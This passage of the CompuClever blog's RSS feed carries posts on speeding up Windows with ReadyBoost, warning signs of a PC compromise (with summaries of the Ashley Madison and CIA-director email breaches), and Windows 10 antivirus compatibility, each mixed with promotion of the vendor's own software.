<p><a href="https://www.compuclevergear.com/collections/windows-repair-recovery-discs" target="_blank" rel="noopener noreferrer"><img decoding="async" loading="lazy" class="emailImage aligncenter" style="height: auto; max-width: 250px; width: 100%; border: 1px solid #00adef;" title="Windows 7 Recovery Disc" src="https://www.compuclever.com/posts/wp-content/uploads/Windows7-Recovery-Disk_resize.png" alt="" width="250" height="250" /></a></p>
<p><a href="https://www.compuclevergear.com/collections/windows-repair-recovery-discs" target="_blank" rel="noopener noreferrer"><img decoding="async" loading="lazy" class="emailImage aligncenter" style="height: auto; max-width: 250px; width: 100%; border: 1px solid #00adef;" title="Windows 8 Recovery Disc" src="https://www.compuclever.com/posts/wp-content/uploads/Windows8-Recovery-Disk_resize.png" alt="" width="250" height="250" /></a></p>
<p><a href="https://www.compuclevergear.com/collections/windows-repair-recovery-discs" target="_blank" rel="noopener noreferrer"><img decoding="async" loading="lazy" class="emailImage aligncenter" style="height: auto; max-width: 250px; width: 100%; border: 1px solid #00adef;" title="Windows 10 Recovery Disc" src="https://www.compuclever.com/posts/wp-content/uploads/Windows10-Recovery-Disk_resize.png" alt="" width="250" height="250" /></a></p>
<p>Having a Windows Recovery Disc ready by your PC provides you a peace of mind with an emergency plan for both your PC and your important files and data.</p>
<p>Always be prepared and don&#8217;t be caught in the rain without an umbrella.</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/windows-recovery-disc-get-one-free-before-you-need-it/">Windows Recovery Disc &#8211; Be Prepared Ahead of Time</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Speed up Your PC with ReadyBoost</title>
		<link>https://www.compuclever.com/posts/readyboost/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=readyboost</link>
		
		<dc:creator><![CDATA[Andy Thompson]]></dc:creator>
		<pubDate>Thu, 02 Mar 2017 06:03:56 +0000</pubDate>
				<category><![CDATA[computer fixes]]></category>
		<category><![CDATA[improving performance]]></category>
		<category><![CDATA[increasing speed]]></category>
		<category><![CDATA[Newsletter]]></category>
		<category><![CDATA[PC hardware]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Windows tips]]></category>
		<category><![CDATA[ReadyBoost]]></category>
		<category><![CDATA[Speed]]></category>
		<category><![CDATA[USB]]></category>
		<guid isPermaLink="false">http://www.compuclever.com/posts/?p=2383</guid>

					<description><![CDATA[<p>ReadyBoost is an easy way to take an older system lacking in available RAM memory and suffering poor performance, and enhancing it.  You don’t have to open up your PC and upgrade it.  It really is fast and easy to see real improvements. </p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/readyboost/">Speed up Your PC with ReadyBoost</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="top_p">
<div class="quick_facts">All PC users have likely experienced the frustration related to slow performance.  There’s something just not right about having to wait for your PC to switch from one application to another.  We want to multi-task and we want a PC system that does not suffer any delays.  And, we ask, why not?  It’s an extension of what we are capable of.  So what are the choices in dealing with slow performing systems?  We can keep our original PC just as it is with very few applications (not taking full advantage of its capabilities and not much fun).  We can live with frustration and wait for the PC to respond when it is slow.  We can look at the costs associated with adding more RAM or increasing other hardware.  Instead of these options, we suggest a fast, easy, free alternative offered by Microsoft called ReadyBoost.</div>
</div>
<p>In our <a href="https://www.compuclever.com/posts/the-key-usb/" target="_blank" rel="noopener noreferrer">previous article</a> we provided information about USB technology including USB flash drives.  With that information in hand you are ready to speed up your PC with ReadyBoost.  Let’s start with an overview of the technology.</p>
<h1>Who Will Benefit?</h1>
<p>Using this technology is best for users with 8 GB of RAM or lower, using a traditional spinning platter hard drive (HDD), and an operating system of Windows Vista or higher.</p>
<div class="quick_facts"><strong>How to determine how much RAM you have: </strong><br />
Do one of the following:</p>
<ol>
<li>Open up your Computer window (Windows / File Explorer), locate: <strong>Computer</strong> (or “This PC”), right-click and select <strong>Properties</strong>.</li>
<li>Open up the Control Panel and select: System and Security and in the “System” section select <strong>View amount of RAM and processor speed</strong>.</li>
</ol>
<p>In the window that appears you can now view the specific operating system, the amount of physical memory (RAM), and other system information.</p>
</div>
<p>ReadyBoost will have little performance improvement or will be irrelevant if:</p>
<div class="indent_left">
<ul>
<li>You already have a lot of RAM (&gt; 16 GB) on your system</li>
<li>You are using a SSD drive.</li>
</ul>
</div>
<h1>The Technology:</h1>
<p>From the many articles we have passed on to you in the past, you likely have a good idea that CompuClever programs such as PC TuneUp Maestro and PC Clean Maestro can regain performance that has been lost due to: <a href="https://www.compuclever.com/posts/disk-defragmentation-and-pc-performance/" target="_blank" rel="noopener noreferrer">defragmentation</a>; <a href="https://www.compuclever.com/posts/spring-pc-cleaning/" target="_blank" rel="noopener noreferrer">clutter of junk files</a> and <a href="https://www.compuclever.com/posts/the-clean-and-uninstaller-tools/" target="_blank" rel="noopener noreferrer">unwanted applications</a> (leading to the reduction of available space).  These tools can also assist you when faced with <a href="https://www.compuclever.com/posts/bogged-down/" target="_blank" rel="noopener noreferrer">a bogged down Internet connectivity</a> as well as using functions related to<a href="https://www.compuclever.com/posts/restore-internet-browser/" target="_blank" rel="noopener noreferrer"> improving browser speed</a> and <a href="https://www.compuclever.com/posts/improve-startup/" target="_blank" rel="noopener noreferrer">startup speed</a>.</p>
<p>Now we can shine some light on a technology that can take your PC as it is, and can extend its performance abilities.  Keep in mind we still recommend that you enhance your performance through regular clean up and maintenance.</p>
<p>The basics of the technology involve being able to cache data to a device.  In this case, the device is a USB flash drive.  You can also use CompactFlash and SD cards.  How it works is that data is temporarily stored on the flash drive so that it can be retrieved faster than using the internal hard drive and available memory (RAM or “Random Access Memory”).  Flash memory, such as a USB drive or SSD (Solid State Drive), benefit from faster seek times than standard magnetic hard disk drives.  The only limitation is that USB flash drives will wear out in time.  By some estimates<sup><a href="#_footnotes">[1]</a></sup> this won’t be for approximately 10 years.</p>
<h1>Here’s How To:</h1>
<p>You can begin by using a USB flash card that has at least 1 gigabyte (GB) of available space.  For best results, use a flash drive or flash memory card with at least double the amount of available space as the amount of memory (RAM) in your computer.<sup><a href="#_footnotes">[2]</a></sup></p>
<div class="quick_facts">
<p><strong>Flash memory card specifications</strong>:</p>
<ul>
<li>You can use a maximum of 32 GB of available space on any single removable storage device.</li>
<li>The USB flash drive must support USB 2.0 or higher and your computer must have at least one free USB 2.0 port to plug in the drive.  <strong>Note</strong>: ReadyBoost works best if you plug the flash drive into a USB port directly rather than an external USB hub shared with other USB devices.</li>
<li>Most memory cards work with ReadyBoost.  Different kinds of flash memory cards include CompactFlash and Secure Digital (SD).  <strong>Note</strong>: Some SD memory cards don&#8217;t work well with ReadyBoost due to issues with the SD card interface.  ReadyBoost displays a warning message in these cases.</li>
</ul>
</div>
<h1>To enable or disable ReadyBoost:</h1>
<div class="indent_left">
<ol>
<li>Plug a USB flash drive or flash memory card into an available port.</li>
<li>The <strong>Autoplay</strong> dialog box appears.  Under the <strong>General options</strong>, you can click <strong>Speed up my system</strong>.</li>
<li>The <strong>Properties</strong> dialog box opens.  <strong>Note</strong>: You can also access this dialog any time by opening the Computer window (Windows / File Explorer), right-clicking the drive, and selecting <strong>Properties</strong>.Next, click the tab: <strong>ReadyBoost</strong>.<img decoding="async" class="emailImage aligncenter" style="height: auto; max-width: 377px;" title="ReadyBoost configuration" src="https://www.compuclever.com/posts/wp-content/uploads/readyboost-configure.jpg" alt="" />You can then do one of the following (as seen in the image here):
<ul>
<li>To turn ReadyBoost off, click: <strong>Do not use this device</strong>.</li>
<li>To use the maximum available space, click: <strong>Dedicate this device to ReadyBoost</strong>.  Windows will leave any files already stored on the device, but it&#8217;ll use the rest of the space to enhance system performance.</li>
<li>To use less than the maximum available space on the device, click <strong>Use this device</strong>, and then move the slider to choose the amount of available space on the device you want to use.</li>
</ul>
</li>
<li>Click <strong>OK</strong>.</li>
</ol>
</div>
<p>Windows displays the recommended space to use for optimal performance.  If there isn’t enough space for ReadyBoost, a message is displayed telling you to free some space on the device.</p>
<h1>The Benefits:</h1>
<p>Our CompuClever team members have used ReadyBoost on a few systems that were so slow we faced having to replace them.  We noted significant gains in performance of these computers.  For systems that have only 2 or 4 GBs of RAM, the performance gains are significant.</p>
<p>We researched test results for ReadyBoost and found <a href="http://www.digitalcitizen.life/does-readyboost-work-does-it-improve-performance-slower-pcs" target="_blank" rel="noopener noreferrer">a very good site</a>.  Here is a list of improvements as well as situations where there are no performance gains.</p>
<p>When enabling <em>ReadyBoost</em> on a system with low amounts of RAM, you can experience:</p>
<div class="indent_left">
<ul>
<li>Opening media files like photos, music or video is slightly faster (approximately by 2%).</li>
<li>The loading of web pages and the use of Office applications is slightly faster (approximately by 2%).</li>
<li>Your system&#8217;s boot timings are improved (up to 7%).</li>
<li>Your most used applications start faster (by 10 to 15%).</li>
</ul>
</div>
<p>This same site states:</p>
<div class="indent_left">You will not notice any difference with <em>ReadyBoost</em> enabled when you play games or you run applications that are CPU or GPU intensive.  Also the improvements get smaller when you add more RAM.  On a system with more than 4GB of RAM you will not notice anything getting better.  Also, adding an SSD drive to your computer means that there is no point in using <em>ReadyBoost</em>.  We&#8217;ve done some very quick tests after adding an SSD and we quickly noticed that <em>ReadyBoost</em> becomes irrelevant.</div>
<h1>Ejecting Flash Drives:</h1>
<p>It is good practice to eject flash drives that are in use.  This means closing windows and applications using the device and then using the Safely Remove Hardware icon.  In doing so, you eliminate the risk of losing data or experiencing data corruption – especially when files are being transferred.</p>
<div class="quick_facts"><strong>To properly eject a drive</strong>:<br />
Use the Safely Remove Hardware icon and eject your device before pulling it out of the USB port.<img decoding="async" class="emailImage aligncenter" style="height: auto; max-width: 500px;" title="Safely remove USB" src="https://www.compuclever.com/posts/wp-content/uploads/safe-remove-device.png" alt="" /><br />
You can also locate the drive in the Computer window (Windows / File Explorer) right-click it, and select <strong>Eject</strong>.  Windows will tell you when it’s safe to remove the device thereby eliminating any chances of data corruption.</div>
<h1>The exception:</h1>
<p>In our research we found that:</p>
<div class="indent_left">Microsoft does not require ReadyBoost devices to be ejected before being removed. The ReadyBoost files are simply a cache for the real files being written to disk and removing the drive without ejecting does not harm the system.<sup><a href="#_footnotes">[3]</a></sup></div>
<p>In fact, you can leave your ReadyBoost enabled drive inserted in the port and shutdown your system.  In this way, when you start up your PC you can also enhance startup time performance.</p>
<h1>Summary:</h1>
<p>There are few disadvantages to this free technology.  You need to dedicate a USB port for your drive (using a USB hub is possible but not preferred).  Also, your flash drive will eventually need to be replaced… but before that happens you’ll likely have purchased a new system entirely.  Cost is not really a factor though.  Flash memory drives are fairly inexpensive and certainly not as much as installing new hardware or buying a new system altogether.</p>
<p>Given all this, we strongly feel that ReadyBoost can extend the life of older PCs that are lacking the necessary RAM and are not able to keep up in a fast computing world.  We hope you enjoy the benefits as we have.</p>
<h1></h1>
<p>We will continue to provide story lines like this that benefit all of us and we will describe them in a manner that is within reach of everyday computer users.  If you have some ideas of topics you would like us to cover, email us at: <a href="mailto:newsletter@compuclever.co">newsletter@compuclever.com</a></p>
<div class="bottom_p">
<p>&nbsp;</p>
<hr size="1" />
<p>&nbsp;</p>
<p>[1] <a href="https://en.wikipedia.org/wiki/ReadyBoost">https://en.wikipedia.org/wiki/ReadyBoost</a><br />
[2] <a href="http://windows.microsoft.com/en-ca/windows/turn-readyboost-on-off-storage-device#1TC=windows-7">http://windows.microsoft.com</a><br />
[3] <a href="http://www.howtogeek.com/69869/when-should-you-properly-eject-your-thumb-drive/">http://www.howtogeek.com/</a></p>
</div>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/readyboost/">Speed up Your PC with ReadyBoost</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Signs of a PC Attack</title>
		<link>https://www.compuclever.com/posts/signs-of-a-pc-attack/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=signs-of-a-pc-attack</link>
		
		<dc:creator><![CDATA[Andy Thompson]]></dc:creator>
		<pubDate>Wed, 02 Dec 2015 20:31:37 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">http://www.compuclever.com/posts/?p=2222</guid>

					<description><![CDATA[<p>“Errare Humanum Est” &#8211; To err is human. We take no pleasure in pointing out that there have been PC security breaches that have had considerable impact on people’s lives.  Sensitive data can fall into the wrong hands and we fully appreciate that this happens.  We point it out here to emphasize that one, it [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/signs-of-a-pc-attack/">Signs of a PC Attack</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="top_p">
<div class="quick_facts">
<p>“Errare Humanum Est” &#8211; To err is human.</p>
<p>We take no pleasure in pointing out that there have been PC security breaches that have had considerable impact on people’s lives.  Sensitive data can fall into the wrong hands and we fully appreciate that this happens.  We point it out here to emphasize that one, it does happen; and two, it can happen to the best of us.  Well… to those of us that have placed considerable effort, time, and resources on having high levels of security in place.</p>
<p>Despite best efforts and intentions – it can happen.  So let’s first review some recent hacks and then move on to detecting the signs that your PC may have been compromised.</p>
</div>
</div>
<h1>Ashley Madison</h1>
<p><img decoding="async" class="emailImage aligncenter" style="height: auto; min-width: 300px; width: 100%;" title="Ashley Madison" src="https://www.compuclever.com/posts/wp-content/uploads/MAD-Magazine-Josh-Duggar-Ashley-Madison_55d5fc19d23587.61595110.jpg" alt="" /><br />
Let’s start off with the details of the Ashley Madison attack which are now more available to the public – along with all the compromised data. The aftermath of this unprecendented privacy attack <a href="https://www.compuclever.com/posts/a-personal-encounter-with-ashley-madison/" target="_blank">had even reached our own team at CompuClever</a>.</p>
<div class="indent_left">
<p><strong>What Was Taken?</strong> Employee emails &#8211; 300 GB of emails &#8211; as well as tens of thousands of user pictures and messages.  The data stolen includes: names, addresses, email accounts, and details about sexual preferences.  The sexual preference data was made public in the files that were released.</p>
<p><strong>How?</strong> It’s called a SQL-injection hack.  This attack takes advantage of a software application running on the site which causes the site’s databases to fork over the data.</p>
<p><strong>What Was The Motive?</strong> “…because they [the attackers] were morally outraged at the behavior its web sites [Ashley Madison’s sites] condoned”<sup><a href="#_footnotes">[1]</a></sup></p>
<p><strong>Security: What Did They Do Right?</strong> They didn’t store full credit card information in the database and they were able to protect customer passwords.</p>
<p><strong>What Did They Do Wrong?</strong> This would include the following…</p>
<div class="indent_left">
<ul>
<li>Not effectively protecting credit card transactions and personal information.</li>
<li>Recording IP addresses of their accountholders.  This opens the door in determining that, for example, hundreds of US government employees, some with positions in the White House, Congress and law enforcement agencies, were using government web connections to access their Ashley Madison accounts.  The list includes an attorney in the Justice Dept and a government hacker working for the Department of Homeland Security!</li>
</ul>
</div>
</div>
<h1>CIA Director – John Brennan</h1>
<p><img decoding="async" class="emailImage aligncenter" style="height: auto; min-width: 300px; width: 100%;" title="John Brennan" src="https://www.compuclever.com/posts/wp-content/uploads/medium.jpg" alt="" /><br />
We were surprised to hear of a recent hack to the email account of the CIA Director John Brennan.  It may not have been as well publicized, but it does come as being equally shocking.  Let’s use the same format to look more closely at the details.</p>
<div class="indent_left">
<p><strong>How?</strong> There was a claim made by a hacker who describes having broken into John Brennan’s AOL account.  The hacker says he first did a reverse lookup of Brennan’s mobile phone number to discover that he was a Verizon customer.  Then one of the hackers posed as a Verizon technician and called the company asking for details about Brennan’s account.  Verizon gave up information including: account number, four-digit PIN, the backup mobile number on the account, Brennan’s AOL email address, and the last four digits on his bank card.  The hacking team then contacted AOL stating their account had been locked out and they lured AOL into resetting the password.  Brennan’s AOL account was repeatedly reset despite Brennan’s efforts to regain control of it.  The hackers also breached the Comcast account of Homeland Security Secretary, Jeh Johnson.</p>
<p><strong>What Was Taken?</strong> The hackers described gaining access to sensitive government documents stored as attachments in Brennan’s personal account after he had forwarded them from his work email.  The documents include a sensitive 47 page SF86 form that Brennan had filled out to obtain his top-secret government security clearance.</p>
<div class="indent_left">“Among the attachments was a spreadsheet containing names and Social Security numbers—some of them for US intelligence officials—and a letter from the Senate asking the CIA to halt its use of harsh interrogation techniques—that is, its controversial use of torture tactics.” <sup><a href="#_footnotes">[2]</a></sup></div>
<p>There have been in fact two letters published by WikiLeaks by former senator chairman Christopher Bond listing the types of torture that should be forbidden for US personnel.  For now, six pilfered files have been made public including the SF86 form.</p>
<p><strong>What Was The Motive?</strong> The hacker states he’s less than 20 years old and was working with two other people on the breach.  He had contacted Brennan by VoIP (online chat call), and when asked what it was they wanted, he replied: ““We just want Palestine to be free and for you to stop killing innocent people.”</p>
<p><strong>Security:  What Did They Do Right?</strong> Given the information here, the struggle to gain control of the AOL account took three attempts and in the end Brennan had to delete his AOL account.  At that point the attackers had enjoyed three days of access.</p>
<p><strong>What Did They Do Wrong?</strong> Transferring sensitive data from work emails (with likely adequate security) to AOL emails.</p>
</div>
<h1>Signs of a PC Attack</h1>
<p><img decoding="async" class="emailImage aligncenter" style="height: auto; min-width: 300px; width: 100%;" title="windows-10-compatible" src="https://www.compuclever.com/posts/wp-content/uploads/onlinebanking-fraud.jpg" alt="" /><br />
If you are suspicious that your PC has been acting “funny” or there are certain indicators which lead you to suspect it may have been tampered with – it could be it is displaying signs of a real malicious attack.  There are certain common traits that our CompuClever support team is very familiar with and that we have found in our research on this topic.  Here is our list.</p>
<h3>1. Friends receive fake emails from you</h3>
<p>If you open up your email “Spam” folder you are likely to see a lot of emails sent by friends and they likely have no idea the emails are being sent.  Likewise, your PC could be sending emails automatically to people in your address book.</p>
<p><strong>Solution</strong>:  This was the first method of passing on viruses in the early days of computing.  These days it is more likely that only some emails are sent to a subset of your email addresses.  It could be that the emails and contact information was stolen from social media sites and has nothing to do with your computer.  To be on the safe side it is best to run an AV scan and check for unwanted items installed on your PC.</p>
<div class="quick_facts">PC Clean Maestro also has an Uninstaller   tool.  You can open the program, select   the “Uninstaller” tab, and examine the items listed in the “Recently Added”   tab.  Select any item that is unwanted   and click the “Uninstall” button.</div>
<h3>2. Unwanted browser toolbars</h3>
<p>This is a common sign of malware exploitation.  You are likely experiencing several toolbars on your web browser that were not there previously.  Unless you recognize the vendor or know how it got there &#8211; you need to take action.</p>
<p><strong>Solution</strong>:  Remove unwanted toolbars and, if required, reset your browser to the original settings.</p>
<div class="quick_facts">Open PC Clean Maestro and click the “Browsers”   tab.  Select the web browser you are   using and click the “Restore [browser name] Default Settings” button at the   top right. For more information, read our previous coverage about <a href="https://www.compuclever.com/posts/restore-internet-browser/" target="_blank">how to clean and restore web browser</a>.</div>
<h3>3. Frequent random popups</h3>
<p>This is both common and annoying! What you experience is browser popups from websites.  There are websites that can be hijacked or are illegitimate and they can override the mechanisms in place to prevent popups.</p>
<p><strong>Solution</strong>:  Get rid of any toolbars that are recently added (see item #2 above) and recently installed items that are unfamiliar to you (as above in item #1). For more information, read our previous coverage about <a href="https://www.compuclever.com/posts/foistware-messing-up-your-pc-experience/" target="_blank">foistware and how to remove them</a>.</p>
<h3>4. Fake AV (antivirus) messages</h3>
<p>This is similar to the previous      item.  The chances are if you are      seeing warning messages, you are likely infected.  In all likelihood malware has taken      advantage of an unpatched application such as Java software or an Adobe      program.  The scam includes a fake      scan of your system identifying lots of viruses that are not really      there.  If you follow the directions      you can be taken to a well-designed site which accepts your financial      payment information.  This scam also      results in their gaining full control of your system.</p>
<p><strong>Solution</strong>:  Save any information and close any applications that you can and then power down your PC.  You can disconnect from any wireless source by turning off your Wi-Fi router (or open in Safe mode if you are familiar with this), and then remove any items that have recently been installed (as above in item #1).  Connect to the Internet again if it feels safe to do so and then run a full AV scan.</p>
<h3>5. Booby trap website</h3>
<p>This is where you      click a link (such as the ones that come up after a web search), and the      link takes you to a site you were not expecting.  In some cases a message pops up on your      screen and displays a warning that you have a virus.  Next, a voice comes on your speakers      saying you need to call the phone number provided right away or your      system will be infected.  You are      unable to turn off these warnings even when closing the browser.</p>
<p><strong>Solution</strong>:  Turn down your speakers or mute them.  Press the following keys in sequence: Ctrl + Shift + Esc.  Your Task Manager will appear and you can select the items in the list and click the button “End Task”.  If you can’t find the item on that list open the “Processes” tab and examine the CPU column.  Select items that are showing CPU activity and do not appear to be part of the system functions, and then select “End Process”.</p>
<h3>6. Online      passwords change</h3>
<p>If you experience      an online password or passwords having changed it could be that you have      been hacked or the site has been hacked.       We covered this scenario in the CIA Director hack.  The term for this is a phishing scam.  Confidential information was obtained      through illegitimate means.  The      hacker then changes the logon information (such as the password), and then      can proceed to steal finances or make transactions.  In some cases the hacker can pretend to      be you using your information in an attempt to gain finances from friends      or acquaintances.</p>
<p><strong>Solution</strong>:  Notify the online service to report the compromised account.  If friends or acquaintances are involved, notify all your contacts and warn them to not fall victim to the scam.  If you used the same login information on other sites or financial institutions, change the credentials right away.</p>
<h3>7. Unexpected      software installs</h3>
<p>We have <a href="https://www.compuclever.com/posts/virus-vs-potentially-unwanted-programs/" target="_blank">in past      articles referred to PUPs</a> – Potentially Unwanted Programs and how they      appear on your PC without apparent provocation.  You may have read also how we strongly      recommend that you read software licenses and un-select any items that may      appear during installation of a legitimate application.  In many cases these items appear after      you have installed a program you want but the installation was a bundled      software package.</p>
<p><strong>Solution</strong>:  As stated in item #1 above, locate the item or items and uninstall.</p>
<h3>8. Your      mouse moves by itself</h3>
<p>Yikes!  You have been hacked.  Sometime a mouse can jump on the screen      to a different section but if it appears it is making selections as though      being operated from an invisible user – you have been hacked.  This often can be seen when your system      is idle for a long period of time and hackers will attempt to access your      finances or perform various malicious actions for financial gain or to      further cripple your system.</p>
<p><strong>Solution</strong>:  If you can take a video of the event this will help when attempting to recover any losses.  If they are accessing your financial accounts power off your system or turn off the WiFi router.  You’ll need to use an unaffected PC and change all your account credentials / passwords to any financial transaction sites.   Next, report the attack and contact professionals.  You may need to completely restore your PC (see item #9).</p>
<div class="quick_facts"><strong>Note</strong>:   The Federal Trade Commission, or FTC, is an   independent US agency that works for consumers.  The FTC <a href="https://www.ftccomplaintassistant.gov/#crnt&amp;panel1-1" target="_blank">offers a complaint assistance site</a></div>
<h3>9. Certain      functions are disabled and can’t be restarted</h3>
<p>Another common sign that is a clear      indication that your system is compromised is having certain functions      disabled – especially your AV application or Windows Task Manager.  If you do not know how these were      disabled and suspect they were tampered with you need to take action      immediately.</p>
<p><strong>Solution</strong>:  You will need to restore your system to a previous working condition.  Start by examining your system using the methods described above.  Next…</p>
<div class="quick_facts">…open up PC TuneUp Maestro and click the “Fix   &amp; Clean” menu item in the left panel.    Select “Backup &amp; Restore” and follow the steps.</div>
<h3>10. Your      bank account is missing money</h3>
<p>Hackers will steal      large sums of money if they have your financial credentials.  Typically this involves transferring      funds to a foreign exchange or bank.       This could mean that you have been the victim of a phishing scam or      that your PC has been sabotaged.</p>
<p><strong>Solution</strong>:  In most cases financial institutions will replace stolen funds and will work to stop the transaction before the damage is done.  There have been some cases where the courts rule in favor of the bank if negligence is proven on the part of the customer.  Contact your financial institution immediately and perform an AV scan of your system.  In terms of prevention, make sure your financial institution sends you alerts in the event of suspicious activities or if certain transactions thresholds are exceeded. We strongly recommend that you acquire <a href="https://www.compuclever.com/posts/safe-guard-your-online-banking/" target="_blank">a qualified antivirus solution that provides you with adequate protection for online banking</a>.</p>
<h3>11. Online      purchases are made by a hacker</h3>
<p>This involves      having the perpetrator hijack an online account, making a purchase, and      shipping the purchased item(s) to a select destination.  This can involve ordering many items of      merchandise at one time when you still have sufficient funds to cover the      purchases.</p>
<p><strong>Solution</strong>:  You need to change your logon credentials and determine how they were compromised in the first place.  The previous solutions above can be considered.  Fortunately, credit card companies deal with fraudulent transactions much better than in previous years.  We recommend reporting the crime as pointed out above in item #8 and scanning your system for evidence of infection.</p>
<div class="quick_facts"><strong>Note</strong>:    For more information and links for attacks related to identity theft   and other compromises to credentials and finances, see our article on <a href="https://www.compuclever.com/posts/tech-support-fraud/" target="_blank">Tech Support   Fraud</a>.</div>
<h1>Antivirus Solutions</h1>
<p>Let’s face it, being 100% on top of potential malware attacks all the time is not achievable.  Having the right tools in place takes most of the burden off.  AV security tools are a necessary part of our PC reality.  This year we are pleased to have entered this arena with what we know to be a top contender – <a href="https://www.compuclever.com/products/antivirus/" target="_blank">CompuClever AntiVirus PLUS</a>.<a href="#_ftn3"></a> It is capable of monitoring the behaviour of PC processes in real-time and it detects suspicious activities.</p>
<p>Many AV applications need to face the ongoing challenge of dealing with new malware exploits – especially those that are less than 24 hours old.  In order to do this, heuristics are utilized.</p>
<div class="quick_facts"><strong>Heuristics</strong>:   This is a rule-based method of identifying new viruses.  This method does not rely on specific   signatures of a virus.  Instead it   needs to “intelligently” recognize behaviours that are potentially malicious.</div>
<h1>In Summary</h1>
<p>We have covered a great deal of PC attack scenarios.  It is our hope that you do not experience any of these.  If you do see the warning signs, we encourage you to take the necessary actions as described here.  Keep in mind that there are agencies and professionals that can assist you when the chips are down.  For our CompuClever customers we have a well qualified team of support technicians that are available.  Visit our Support Center at: <a href="https://www.compuclever.com/support/">https://www.compuclever.com/support/</a></p>
<p>If you have some ideas of topics you would like us to cover or have other feedback to offer, email us at: <a href="mailto:newsletter@compuclever.co">newsletter@compuclever.com</a><br />
<a id="_footnotes"></a></p>
<div class="bottom_p">
<hr size="1" />
<p>[1]<a href="http://www.wired.com/2015/08/ashley-madison-hack-everything-you-need-to-know-your-questions-explained/">http://www.wired.com/2015/08/</a><br />
[2]<a href="http://www.wired.com/2015/10/hacker-who-broke-into-cia-director-john-brennan-email-tells-how-he-did-it/">http://www.wired.com/2015/10/</a></p>
</div>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/signs-of-a-pc-attack/">Signs of a PC Attack</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Windows 10 and Antivirus</title>
		<link>https://www.compuclever.com/posts/windows-10-and-antivirus/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=windows-10-and-antivirus</link>
		
		<dc:creator><![CDATA[Andy Thompson]]></dc:creator>
		<pubDate>Fri, 18 Sep 2015 18:04:33 +0000</pubDate>
				<category><![CDATA[CompuClever Antivirus PLUS]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Windows 10]]></category>
		<guid isPermaLink="false">http://www.compuclever.com/posts/?p=2156</guid>

					<description><![CDATA[<p>Windows 10 imposes new standard for antivirus programs. CompuClever Antivirus PLUS is now Windows 10 compatible. </p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/windows-10-and-antivirus/">Windows 10 and Antivirus</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>During the launch event of our newly released security product &#8211;   CompuClever Antivirus PLUS 2016 back in August, many keen users have  contacted us about Windows 10 support. I am very excited to announce, as  of today, CompuClever Antivirus PLUS 2016 officially supports Windows  10.</p>
<p><a href="https://www.compuclever.com/products/antivirus/" target="_blank">&gt;&gt; Learn more about CompuClever Antivirus PLUS<br />
</a></p>
<p>Now, with Windows 10, Microsoft imposes stringent requirements  for antivirus software to ensure they are fully compliant to the  enhanced security Application Programming Interface (API) specification  for Windows 10, AND that the antivirus program also contributes  positively to the user experience especially in terms of impact to PC  performance. CompuClever Antivirus PLUS 2016 fully meets these new and  heightened standards. The antivirus software has been officially  approved by Microsoft as being compatible with Windows 10.</p>
<p><a href="https://www.compuclever.com/products/antivirus/" target="_blank">&gt;&gt; CompuClever Antivirus PLUS 2016 Now Supports Windows 10</a></p>
<p>If you are upgrading to Windows 10, please be aware that  Microsoft said: “If your anti-malware subscription is not current  (expired), Windows will uninstall your application and enable Windows  Defender”. We have expressed our concerns about Windows Defender stating  that it is not the best antivirus protection you can get, free or paid,  even according to <a href="http://www.pcmag.com/article2/0,2817,2480487,00.asp" target="_blank">PC Magazine</a>.  We recommend anyone upgrading to Windows 10 should check what antivirus protection is running after making the switch.</p>
<p><a href="https://www.compuclever.com/posts/are-you-well-protected/" target="_blank">&gt;&gt; How to tell if your antivirus provides you enough protection</a></p>
<p>With CompuClever Antivirus PLUS, you can  protect a PC with the best antivirus technology trusted by over 500  million users around the world. Still not convinced? No worries, take a FREE 7-day trial for a  spin and we guarantee that you will see the difference between your  current antivirus program and CompuClever Antivirus PLUS 2016, which  offers total security protection with no compromise of PC speed.</p>
<div class="bottom_p">
Give you and your family the best PC security protection available!
</div>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/windows-10-and-antivirus/">Windows 10 and Antivirus</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Spring PC Cleaning</title>
		<link>https://www.compuclever.com/posts/spring-pc-cleaning/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=spring-pc-cleaning</link>
		
		<dc:creator><![CDATA[Andy Thompson]]></dc:creator>
		<pubDate>Fri, 06 Jun 2014 04:33:12 +0000</pubDate>
				<category><![CDATA[improving performance]]></category>
		<category><![CDATA[increasing speed]]></category>
		<category><![CDATA[PC Clean Maestro]]></category>
		<category><![CDATA[PC Cleaner]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Windows tips]]></category>
		<guid isPermaLink="false">http://www.compuclever.com/posts/?p=1521</guid>

